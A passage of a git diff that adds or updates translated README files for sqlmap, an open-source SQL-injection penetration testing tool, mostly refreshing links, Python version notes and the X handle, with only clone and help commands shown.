* Screenshot: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-ja-JP.md b/doc/translations/README-ja-JP.md
index 8982d303d49..3cbc9ce999c 100644
--- a/doc/translations/README-ja-JP.md
+++ b/doc/translations/README-ja-JP.md
@@ -1,6 +1,6 @@
-# sqlmap
+# sqlmap 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
sqlmapはオープンソースのペネトレーションテスティングツールです。SQLインジェクションの脆弱性の検出、活用、そしてデータベースサーバ奪取のプロセスを自動化します。
強力な検出エンジン、ペネトレーションテスターのための多くのニッチ機能、持続的なデータベースのフィンガープリンティングから、データベースのデータ取得やアウトオブバンド接続を介したオペレーティング・システム上でのコマンド実行、ファイルシステムへのアクセスなどの広範囲に及ぶスイッチを提供します。
@@ -21,31 +21,31 @@ wikiに載っているいくつかの機能のデモをスクリーンショッ
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
-sqlmapは、 [Python](http://www.python.org/download/) バージョン **2.6.x** または **2.7.x** がインストールされていれば、全てのプラットフォームですぐに使用できます。
+sqlmapは、 [Python](https://www.python.org/download/) バージョン **2.6**, **2.7** または **3.x** がインストールされていれば、全てのプラットフォームですぐに使用できます。
-使用法
+使用方法
----
-基本的なオプションとスイッチの使用法をリストするには:
+基本的なオプションとスイッチの使用方法をリストで取得するには:
python sqlmap.py -h
-全てのオプションとスイッチの使用法をリストするには:
+全てのオプションとスイッチの使用方法をリストで取得するには:
python sqlmap.py -hh
実行例を [こちら](https://asciinema.org/a/46601) で見ることができます。
-sqlmapの概要、機能の一覧、全てのオプションやスイッチの使用法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki/Usage) で確認することができます。
+sqlmapの概要、機能の一覧、全てのオプションやスイッチの使用方法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki/Usage) で確認することができます。
リンク
----
-* ホームページ: http://sqlmap.org
+* ホームページ: https://sqlmap.org
* ダウンロード: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* コミットのRSSフィード: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* 課題管理: https://github.com/sqlmapproject/sqlmap/issues
* ユーザーマニュアル: https://github.com/sqlmapproject/sqlmap/wiki
* よくある質問 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
-* Twitter: [@sqlmap](https://twitter.com/sqlmap)
-* デモ: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* X: [@sqlmap](https://x.com/sqlmap)
+* デモ: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
* スクリーンショット: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-ka-GE.md b/doc/translations/README-ka-GE.md
new file mode 100644
index 00000000000..9eb193d1d17
--- /dev/null
+++ b/doc/translations/README-ka-GE.md
@@ -0,0 +1,49 @@
+# sqlmap 
+
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
+
+sqlmap არის შეღწევადობის ტესტირებისათვის განკუთვილი ინსტრუმენტი, რომლის კოდიც ღიად არის ხელმისაწვდომი. ინსტრუმენტი ახდენს SQL-ინექციის სისუსტეების აღმოჩენისა, გამოყენების და მონაცემთა ბაზათა სერვერების დაუფლების პროცესების ავტომატიზაციას. იგი აღჭურვილია მძლავრი აღმომჩენი მექანიძმით, შეღწევადობის პროფესიონალი ტესტერისათვის შესაფერისი ბევრი ფუნქციით და სკრიპტების ფართო სპექტრით, რომლებიც შეიძლება გამოყენებულ იქნეს მრავალი მიზნით, მათ შორის: მონაცემთა ბაზიდან მონაცემების შეგროვებისათვის, ძირითად საფაილო სისტემაზე წვდომისათვის და out-of-band კავშირების გზით ოპერაციულ სისტემაში ბრძანებათა შესრულებისათვის.
+
+ეკრანის ანაბეჭდები
+----
+
+
+
+შეგიძლიათ ესტუმროთ [ეკრანის ანაბეჭდთა კოლექციას](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), სადაც დემონსტრირებულია ინსტრუმენტის ზოგიერთი ფუნქცია.
+
+ინსტალაცია
+----
+
+თქვენ შეგიძლიათ უახლესი tar-არქივის ჩამოტვირთვა [აქ](https://github.com/sqlmapproject/sqlmap/tarball/master) დაწკაპუნებით, ან უახლესი zip-არქივის ჩამოტვირთვა [აქ](https://github.com/sqlmapproject/sqlmap/zipball/master) დაწკაპუნებით.
+
+ასევე შეგიძლიათ (და სასურველია) sqlmap-ის ჩამოტვირთვა [Git](https://github.com/sqlmapproject/sqlmap)-საცავის (repository) კლონირებით:
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap ნებისმიერ პლატფორმაზე მუშაობს [Python](https://www.python.org/download/)-ის **2.6**, **2.7** და **3.x** ვერსიებთან.
+
+გამოყენება
+----
+
+ძირითადი ვარიანტებისა და პარამეტრების ჩამონათვალის მისაღებად გამოიყენეთ ბრძანება:
+
+ python sqlmap.py -h
+
+ვარიანტებისა და პარამეტრების სრული ჩამონათვალის მისაღებად გამოიყენეთ ბრძანება:
+
+ python sqlmap.py -hh
+
+გამოყენების მარტივი მაგალითი შეგიძლიათ იხილოთ [აქ](https://asciinema.org/a/46601). sqlmap-ის შესაძლებლობათა მიმოხილვის, მხარდაჭერილი ფუნქციონალისა და ყველა ვარიანტის აღწერების მისაღებად გამოყენების მაგალითებთან ერთად, გირჩევთ, იხილოთ [მომხმარებლის სახელმძღვანელო](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+ბმულები
+----
+
+* საწყისი გვერდი: https://sqlmap.org
+* ჩამოტვირთვა: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ან [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS არხი: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* პრობლემებისათვის თვალყურის დევნება: https://github.com/sqlmapproject/sqlmap/issues
+* მომხმარებლის სახელმძღვანელო: https://github.com/sqlmapproject/sqlmap/wiki
+* ხშირად დასმული კითხვები (ხდკ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* X: [@sqlmap](https://x.com/sqlmap)
+* დემონსტრაციები: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* ეკრანის ანაბეჭდები: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-ko-KR.md b/doc/translations/README-ko-KR.md
new file mode 100644
index 00000000000..dd508732dde
--- /dev/null
+++ b/doc/translations/README-ko-KR.md
@@ -0,0 +1,50 @@
+# sqlmap 
+
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
+
+sqlmap은 SQL 인젝션 결함 탐지 및 활용, 데이터베이스 서버 장악 프로세스를 자동화 하는 오픈소스 침투 테스팅 도구입니다. 최고의 침투 테스터, 데이터베이스 핑거프린팅 부터 데이터베이스 데이터 읽기, 대역 외 연결을 통한 기반 파일 시스템 접근 및 명령어 실행에 걸치는 광범위한 스위치들을 위한 강력한 탐지 엔진과 다수의 편리한 기능이 탑재되어 있습니다.
+
+스크린샷
+----
+
+
+
+또는, wiki에 나와있는 몇몇 기능을 보여주는 [스크린샷 모음](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 을 방문하실 수 있습니다.
+
+설치
+----
+
+[여기](https://github.com/sqlmapproject/sqlmap/tarball/master)를 클릭하여 최신 버전의 tarball 파일, 또는 [여기](https://github.com/sqlmapproject/sqlmap/zipball/master)를 클릭하여 최신 zipball 파일을 다운받으실 수 있습니다.
+
+가장 선호되는 방법으로, [Git](https://github.com/sqlmapproject/sqlmap) 저장소를 복제하여 sqlmap을 다운로드 할 수 있습니다:
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap은 [Python](https://www.python.org/download/) 버전 **2.6**, **2.7** 그리고 **3.x** 을 통해 모든 플랫폼 위에서 사용 가능합니다.
+
+사용법
+----
+
+기본 옵션과 스위치 목록을 보려면 다음 명령어를 사용하세요:
+
+ python sqlmap.py -h
+
+전체 옵션과 스위치 목록을 보려면 다음 명령어를 사용하세요:
+
+ python sqlmap.py -hh
+
+[여기](https://asciinema.org/a/46601)를 통해 사용 샘플들을 확인할 수 있습니다.
+sqlmap의 능력, 지원되는 기능과 모든 옵션과 스위치들의 목록을 예제와 함께 보려면, [사용자 매뉴얼](https://github.com/sqlmapproject/sqlmap/wiki/Usage)을 참고하시길 권장드립니다.
+
+링크
+----
+
+* 홈페이지: https://sqlmap.org
+* 다운로드: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS 피드 커밋: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* 사용자 매뉴얼: https://github.com/sqlmapproject/sqlmap/wiki
+* 자주 묻는 질문 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* 트위터: [@sqlmap](https://x.com/sqlmap)
+* 시연 영상: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* 스크린샷: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-nl-NL.md b/doc/translations/README-nl-NL.md
new file mode 100644
index 00000000000..03c4dff3ef9
--- /dev/null
+++ b/doc/translations/README-nl-NL.md
@@ -0,0 +1,50 @@
+# sqlmap 
+
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
+
+sqlmap is een open source penetratie test tool dat het proces automatiseert van het detecteren en exploiteren van SQL injectie fouten en het overnemen van database servers. Het wordt geleverd met een krachtige detectie-engine, vele niche-functies voor de ultieme penetratietester, en een breed scala aan switches, waaronder database fingerprinting, het overhalen van gegevens uit de database, toegang tot het onderliggende bestandssysteem, en het uitvoeren van commando's op het besturingssysteem via out-of-band verbindingen.
+
+Screenshots
+----
+
+
+
+Je kunt de [collectie met screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) bezoeken voor een demonstratie van sommige functies in the wiki.
+
+Installatie
+----
+
+Je kunt de laatste tarball installeren door [hier](https://github.com/sqlmapproject/sqlmap/tarball/master) te klikken of de laatste zipball door [hier](https://github.com/sqlmapproject/sqlmap/zipball/master) te klikken.
+
+Bij voorkeur, kun je sqlmap downloaden door de [Git](https://github.com/sqlmapproject/sqlmap) repository te clonen:
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap werkt op alle platformen met de volgende [Python](https://www.python.org/download/) versies: **2.6**, **2.7** en **3.x**.
+
+Gebruik
+----
+
+Om een lijst van basisopties en switches te krijgen gebruik:
+
+ python sqlmap.py -h
+
+Om een lijst van alle opties en switches te krijgen gebruik:
+
+ python sqlmap.py -hh
+
+Je kunt [hier](https://asciinema.org/a/46601) een proefrun vinden.
+Voor een overzicht van de mogelijkheden van sqlmap, een lijst van ondersteunde functies, en een beschrijving van alle opties en switches, samen met voorbeelden, wordt u aangeraden de [gebruikershandleiding](https://github.com/sqlmapproject/sqlmap/wiki/Usage) te raadplegen.
+
+Links
+----
+
+* Homepage: https://sqlmap.org
+* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) of [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Probleem tracker: https://github.com/sqlmapproject/sqlmap/issues
+* Gebruikers handleiding: https://github.com/sqlmapproject/sqlmap/wiki
+* Vaak gestelde vragen (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* X: [@sqlmap](https://x.com/sqlmap)
+* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-pl-PL.md b/doc/translations/README-pl-PL.md
new file mode 100644
index 00000000000..00fdf7b43b9
--- /dev/null
+++ b/doc/translations/README-pl-PL.md
@@ -0,0 +1,50 @@
+# sqlmap 
+
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
+
+sqlmap to open sourceowe narzędzie do testów penetracyjnych, które automatyzuje procesy detekcji, przejmowania i testowania odporności serwerów SQL na podatność na iniekcję niechcianego kodu. Zawiera potężny mechanizm detekcji, wiele niszowych funkcji dla zaawansowanych testów penetracyjnych oraz szeroki wachlarz opcji począwszy od identyfikacji bazy danych, poprzez wydobywanie z niej danych, a nawet pozwalających na dostęp do systemu plików oraz wykonywanie poleceń w systemie operacyjnym serwera poprzez niestandardowe połączenia.
+
+Zrzuty ekranu
+----
+
+
+
+Możesz odwiedzić [kolekcję zrzutów](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrującą na wiki niektóre możliwości.
+
+Instalacja
+----
+
+Najnowsze tarball archiwum jest dostępne po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/tarball/master) lub najnowsze zipball archiwum po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Można również pobrać sqlmap klonując rezozytorium [Git](https://github.com/sqlmapproject/sqlmap):
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+do użycia sqlmap potrzebny jest [Python](https://www.python.org/download/) w wersji **2.6**, **2.7** lub **3.x** na dowolnej platformie systemowej.
+
+Sposób użycia
+----
+
+Aby uzyskać listę podstawowych funkcji i parametrów użyj polecenia:
+
+ python sqlmap.py -h
+
+Aby uzyskać listę wszystkich funkcji i parametrów użyj polecenia:
+
+ python sqlmap.py -hh
+
+Przykładowy wynik działania można znaleźć [tutaj](https://asciinema.org/a/46601).
+Aby uzyskać listę wszystkich dostępnych funkcji, parametrów oraz opisów ich działania wraz z przykładami użycia sqlmap zalecamy odwiedzić [instrukcję użytkowania](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Odnośniki
+----
+
+* Strona projektu: https://sqlmap.org
+* Pobieranie: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) lub [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Zgłaszanie błędów: https://github.com/sqlmapproject/sqlmap/issues
+* Instrukcja użytkowania: https://github.com/sqlmapproject/sqlmap/wiki
+* Często zadawane pytania (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* X: [@sqlmap](https://x.com/sqlmap)
+* Dema: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* Zrzuty ekranu: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-pt-BR.md b/doc/translations/README-pt-BR.md
index ce5e42621a6..6fe64ed6a49 100644
--- a/doc/translations/README-pt-BR.md
+++ b/doc/translations/README-pt-BR.md
@@ -1,8 +1,8 @@
-# sqlmap
+# sqlmap 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
-sqlmap é uma ferramenta de teste de penetração de código aberto que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de penetração por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional.
+sqlmap é uma ferramenta de teste de intrusão, de código aberto, que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de intrusão por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional.
Imagens
----
@@ -14,14 +14,13 @@ Você pode visitar a [coleção de imagens](https://github.com/sqlmapproject/sql
Instalação
----
-Você pode baixar o arquivo tar mais recente clicando [aqui]
-(https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master).
+Você pode baixar o arquivo tar mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master).
De preferência, você pode baixar o sqlmap clonando o repositório [Git](https://github.com/sqlmapproject/sqlmap):
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
-sqlmap funciona em [Python](http://www.python.org/download/) nas versões **2.6.x** e **2.7.x** em todas as plataformas.
+sqlmap funciona em [Python](https://www.python.org/download/) nas versões **2.6**, **2.7** e **3.x** em todas as plataformas.
Como usar
----
@@ -40,12 +39,12 @@ Para ter uma visão geral dos recursos do sqlmap, lista de recursos suportados e
Links
----
-* Homepage: http://sqlmap.org
+* Homepage: https://sqlmap.org
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki
* Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
-* Twitter: [@sqlmap](https://twitter.com/sqlmap)
-* Demonstrações: [#1](http://www.youtube.com/user/inquisb/videos) e [#2](http://www.youtube.com/user/stamparm/videos)
+* X: [@sqlmap](https://x.com/sqlmap)
+* Demonstrações: [#1](https://www.youtube.com/user/inquisb/videos) e [#2](https://www.youtube.com/user/stamparm/videos)
* Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-rs-RS.md b/doc/translations/README-rs-RS.md
new file mode 100644
index 00000000000..de0fb2e2f3e
--- /dev/null
+++ b/doc/translations/README-rs-RS.md
@@ -0,0 +1,50 @@
+# sqlmap 
+
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
+
+sqlmap je alat otvorenog koda namenjen za penetraciono testiranje koji automatizuje proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije i preuzimanje baza podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko uzimanja podataka iz baze, do pristupa zahvaćenom fajl sistemu i izvršavanja komandi na operativnom sistemu korištenjem tzv. "out-of-band" veza.
+
+Slike
+----
+
+
+
+Možete posetiti [kolekciju slika](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gde su demonstrirane neke od e se demonstriraju neke od funkcija na wiki stranicama.
+
+Instalacija
+----
+
+Možete preuzeti najnoviji tarball klikom [ovde](https://github.com/sqlmapproject/sqlmap/tarball/master) ili najnoviji zipball klikom [ovde](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Opciono, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija:
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap radi bez posebnih zahteva korištenjem [Python](https://www.python.org/download/) verzije **2.6**, **2.7** i/ili **3.x** na bilo kojoj platformi.
+
+Korišćenje
+----
+
+Kako biste dobili listu osnovnih opcija i prekidača koristite:
+
+ python sqlmap.py -h
+
+Kako biste dobili listu svih opcija i prekidača koristite:
+
+ python sqlmap.py -hh
+
+Možete pronaći primer izvršavanja [ovde](https://asciinema.org/a/46601).
+Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih funkcija, te opis svih opcija i prekidača, zajedno s primerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Linkovi
+----
+
+* Početna stranica: https://sqlmap.org
+* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS feed promena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues
+* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki
+* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* X: [@sqlmap](https://x.com/sqlmap)
+* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* Slike: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-ru-RU.md b/doc/translations/README-ru-RU.md
new file mode 100644
index 00000000000..c88f532e6b5
--- /dev/null
+++ b/doc/translations/README-ru-RU.md
@@ -0,0 +1,50 @@
+# sqlmap 
+
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
+
+sqlmap - это инструмент для тестирования уязвимостей с открытым исходным кодом, который автоматизирует процесс обнаружения и использования ошибок SQL-инъекций и захвата серверов баз данных. Он оснащен мощным механизмом обнаружения, множеством приятных функций для профессионального тестера уязвимостей и широким спектром скриптов, которые упрощают работу с базами данных, от сбора данных из базы данных, до доступа к базовой файловой системе и выполнения команд в операционной системе через out-of-band соединение.
+
+Скриншоты
+----
+
+
+
+Вы можете посетить [набор скриншотов](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) демонстрируемые некоторые функции в wiki.
+
+Установка
+----
+
+Вы можете скачать последнюю версию tarball, нажав [сюда](https://github.com/sqlmapproject/sqlmap/tarball/master) или последний zipball, нажав [сюда](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Предпочтительно вы можете загрузить sqlmap, клонируя [Git](https://github.com/sqlmapproject/sqlmap) репозиторий:
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap работает из коробки с [Python](https://www.python.org/download/) версии **2.6**, **2.7** и **3.x** на любой платформе.
+
+Использование
+----
+
+Чтобы получить список основных опций и вариантов выбора, используйте:
+
+ python sqlmap.py -h
+
+Чтобы получить список всех опций и вариантов выбора, используйте:
+
+ python sqlmap.py -hh
+
+Вы можете найти пробный запуск [тут](https://asciinema.org/a/46601).
+Чтобы получить обзор возможностей sqlmap, список поддерживаемых функций и описание всех параметров и переключателей, а также примеры, вам рекомендуется ознакомится с [пользовательским мануалом](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Ссылки
+----
+
+* Основной сайт: https://sqlmap.org
+* Скачивание: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) или [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Канал новостей RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Отслеживание проблем: https://github.com/sqlmapproject/sqlmap/issues
+* Пользовательский мануал: https://github.com/sqlmapproject/sqlmap/wiki
+* Часто задаваемые вопросы (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* X: [@sqlmap](https://x.com/sqlmap)
+* Демки: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* Скриншоты: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-sk-SK.md b/doc/translations/README-sk-SK.md
new file mode 100644
index 00000000000..0f32c0c4d14
--- /dev/null
+++ b/doc/translations/README-sk-SK.md
@@ -0,0 +1,50 @@
+# sqlmap 
+
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
+
+sqlmap je open source nástroj na penetračné testovanie, ktorý automatizuje proces detekovania a využívania chýb SQL injekcie a preberania databázových serverov. Je vybavený výkonným detekčným mechanizmom, mnohými výklenkovými funkciami pre dokonalého penetračného testera a širokou škálou prepínačov vrátane odtlačkov databázy, cez načítanie údajov z databázy, prístup k základnému súborovému systému a vykonávanie príkazov v operačnom systéme prostredníctvom mimopásmových pripojení.
+
+Snímky obrazovky
+----
+
+
+
+Môžete navštíviť [zbierku snímok obrazovky](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), ktorá demonštruuje niektoré funkcie na wiki.
+
+Inštalácia
+----
+
+Najnovší tarball si môžete stiahnuť kliknutím [sem](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo najnovší zipball kliknutím [sem](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Najlepšie je stiahnuť sqlmap naklonovaním [Git](https://github.com/sqlmapproject/sqlmap) repozitára:
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap funguje bez problémov s programovacím jazykom [Python](https://www.python.org/download/) vo verziách **2.6**, **2.7** a **3.x** na akejkoľvek platforme.
+
+Využitie
+----
+
+Na získanie zoznamu základných možností a prepínačov, použite:
+
+ python sqlmap.py -h
+
+Na získanie zoznamu všetkých možností a prepínačov, použite:
+
+ python sqlmap.py -hh
+
+Vzorku behu nájdete [tu](https://asciinema.org/a/46601).
+Ak chcete získať prehľad o možnostiach sqlmap, zoznam podporovaných funkcií a opis všetkých možností a prepínačov spolu s príkladmi, odporúčame vám nahliadnuť do [Používateľskej príručky](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Linky
+----
+
+* Domovská stránka: https://sqlmap.org
+* Stiahnutia: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Zdroje RSS Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Sledovač problémov: https://github.com/sqlmapproject/sqlmap/issues
+* Používateľská príručka: https://github.com/sqlmapproject/sqlmap/wiki
+* Často kladené otázky (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* X: [@sqlmap](https://x.com/sqlmap)
+* Demá: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* Snímky obrazovky: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
\ No newline at end of file
diff --git a/doc/translations/README-tr-TR.md b/doc/translations/README-tr-TR.md
index f44bd97fb8f..fb2aba28075 100644
--- a/doc/translations/README-tr-TR.md
+++ b/doc/translations/README-tr-TR.md
@@ -1,6 +1,6 @@
-# sqlmap
+# sqlmap 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap gelişmiş tespit özelliğinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine erişmek, dosya çalıştırmak gibi - işlevleri de barındırmaktadır.
@@ -11,7 +11,7 @@ Ekran görüntüleri

-İsterseniz özelliklerin tanıtımının yapıldığı [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz.
+İsterseniz özelliklerin tanıtımının yapıldığı [ekran görüntüleri](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz.
Kurulum
@@ -23,7 +23,7 @@ Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayar
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
-sqlmap [Python](http://www.python.org/download/) sitesinde bulunan **2.6.x** and **2.7.x** versiyonları ile bütün platformlarda çalışabilmektedir.
+sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** ve **3.x** versiyonları ile bütün platformlarda çalışabilmektedir.
Kullanım
----
@@ -37,17 +37,17 @@ Bütün seçenekleri gösterir
python sqlmap.py -hh
